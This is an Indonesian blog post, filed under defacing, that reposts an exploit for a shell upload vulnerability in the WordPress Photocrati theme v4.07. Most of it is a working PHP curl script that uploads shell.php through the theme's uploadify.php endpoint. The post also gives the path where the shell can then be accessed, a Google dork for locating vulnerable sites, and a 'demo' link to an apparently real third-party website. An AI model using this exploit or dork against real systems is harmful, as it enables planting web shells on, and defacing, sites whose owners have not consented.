Home » Defacing » Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability

Sabtu, 30 Agustus 2014

Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability



############################################################################
# Title : Wordpress Theme Photocrati-theme-v4.07 Shell Upload Vulnerability   
# Author : Aloulou                                             
# Date : 13/05/2014                                                    
# Facebook : http://www.facebook.com/Aloulou.TN                               
# Email: aloulou@alquds.com
# Vendor : www.photocrati.com                                                       
# Google Dork inurl:/wp-content/themes/photocrati-theme-v4.07/
# Tested on : Linux                       
############################################################################
Exploit:
<?php
   
$uploadfile="shell.php";
$ch = curl_init("http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
              array('Filedata'=>"@$uploadfile",'folder'=>'/admin/scripts/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
  print "$postResult";
?>
ShellAccess:
    http://127.0.0.1/wp-content/themes/photocrati-theme-v4.07/admin/scripts/shell.php
Demo:http://www.tanguygilson.com
# Greeting to : Tunisia ,  CyberPink , Brikovich , Anonboy
############################################################################
# 2935E278AA2F72DF   1337day.com [2014-08-31]   0E88B39FD8DD85B4 #

Posted in:
Posting Lebih Baru Posting Lama Beranda

0 komentar:

Posting Komentar